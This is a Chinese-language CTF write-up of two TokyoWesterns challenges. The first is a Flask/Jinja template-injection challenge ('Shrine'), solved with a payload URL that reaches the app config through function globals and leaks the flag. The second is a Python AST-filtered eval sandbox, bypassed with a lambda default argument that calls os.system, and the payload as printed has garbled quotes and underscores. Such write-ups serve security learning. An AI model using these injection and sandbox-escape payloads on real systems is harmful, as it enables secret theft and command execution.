Shrine

app.py源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import flask
import os


app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist])+s
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

题目中(,),config,self都无法直接使用,若想得到Flag,则有两种方法:

  1. 绕过(,)执行命令
  2. 绕过config,self读取配置

绕过括号进行RCE这个思路我到目前都没有什么办法,因此掠过不谈.

在无法使用config的情况,我们可以通过current_app来进行调用config,因此我们需要寻找current_app.

其实到这里可以看出,这个题目的核心思想就是利用继承链读取配置文件,之前已经有类似的文章了:

https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html
https://xz.aliyun.com/t/2308

我们无法在模板中直接调用current_app,因此需要寻找current_app出现的位置.

因此只需要找到一个Fucntion,即可使用__globals__获取current_app.

Payload:

1
2

http://shrine.chal.ctf.westerns.tokyo/shrine/{{request.__class__.__dict__["_load_form_data"].__globals__["current_app"].config}}

Pysandbox

源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
import sys
import ast


blacklist = [ast.Call, ast.Attribute]

def check(node):
    if isinstance(node, list):
        return all([check(n) for n in node])
    else:
        """
    expr = BoolOp(boolop op, expr* values)
         | BinOp(expr left, operator op, expr right)
         | UnaryOp(unaryop op, expr operand)
         | Lambda(arguments args, expr body)
         | IfExp(expr test, expr body, expr orelse)
         | Dict(expr* keys, expr* values)
         | Set(expr* elts)
         | ListComp(expr elt, comprehension* generators)
         | SetComp(expr elt, comprehension* generators)
         | DictComp(expr key, expr value, comprehension* generators)
         | GeneratorExp(expr elt, comprehension* generators)
         -- the grammar constrains where yield expressions can occur
         | Yield(expr? value)
         -- need sequences for compare to distinguish between
         -- x < 4 < 3 and (x < 4) < 3
         | Compare(expr left, cmpop* ops, expr* comparators)
         | Call(expr func, expr* args, keyword* keywords,
             expr? starargs, expr? kwargs)
         | Repr(expr value)
         | Num(object n) -- a number as a PyObject.
         | Str(string s) -- need to specify raw, unicode, etc?
         -- other literals? bools?

         -- the following expression can appear in assignment context
         | Attribute(expr value, identifier attr, expr_context ctx)
         | Subscript(expr value, slice slice, expr_context ctx)
         | Name(identifier id, expr_context ctx)
         | List(expr* elts, expr_context ctx) 
         | Tuple(expr* elts, expr_context ctx)

          -- col_offset is the byte offset in the utf8 string the parser uses
          attributes (int lineno, int col_offset)

        """

        attributes = {
            'BoolOp': ['values'],
            'BinOp': ['left', 'right'],
            'UnaryOp': ['operand'],
            'Lambda': ['body'],
            'IfExp': ['test', 'body', 'orelse'],
            'Dict': ['keys', 'values'],
            'Set': ['elts'],
            'ListComp': ['elt'],
            'SetComp': ['elt'],
            'DictComp': ['key', 'value'],
            'GeneratorExp': ['elt'],
            'Yield': ['value'],
            'Compare': ['left', 'comparators'],
            'Call': False, # call is not permitted
            'Repr': ['value'],
            'Num': True,
            'Str': True,
            'Attribute': False, # attribute is also not permitted
            'Subscript': ['value'],
            'Name': True,
            'List': ['elts'],
            'Tuple': ['elts'],
            'Expr': ['value'], # root node 
        }

        for k, v in attributes.items():
            if hasattr(ast, k) and isinstance(node, getattr(ast, k)):
                if isinstance(v, bool):
                    return v
                return all([check(getattr(node, attr)) for attr in v])


if __name__ == '__main__':
    expr = sys.stdin.readline()
    body = ast.parse(expr).body
    if check(body):
        sys.stdout.write(repr(eval(expr)))
    else:
        sys.stdout.write("Invalid input")
    sys.stdout.flush()

题目涉及到的内容为Python AST的解析绕过,首先使用ast.Parse进行AST的解析,再使用check函数完成AST的检查.在检查过程中,会check目标节点的指定属性,因此只需要找到遗漏的节点属性即可完成绕过.

sandbox2也只是新增了部分check规则,解题思路和sandbox是一样的.

python ast库

安装:

pip install ast

ast解析加载:

ast.parse(expr)

结果示例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
>>> import ast
>>> expr = '''
... import os
... os.system('ls')
... '''
>>> ast.parse(expr)
<_ast.Module object at 0x105f62850>
>>> ast.dump(ast.parse(expr))
"Module(
body=[
	Import(names=[
		alias(name='os', asname=None)
		]
	), 
	Expr(
		value=Call(func=Attribute(
			value=Name(
				id='os', ctx=Load()
				), 
			attr='system', ctx=Load()
			), 
		args=[Str(s='ls')], keywords=[], starargs=None, kwargs=None
		)
	)
])"

对照attributes,可以找出部分存在遗漏的情况,因此找到对应的调用方法即可执行命令.

payload:

lambda x = import(“os”).system(“ls”): x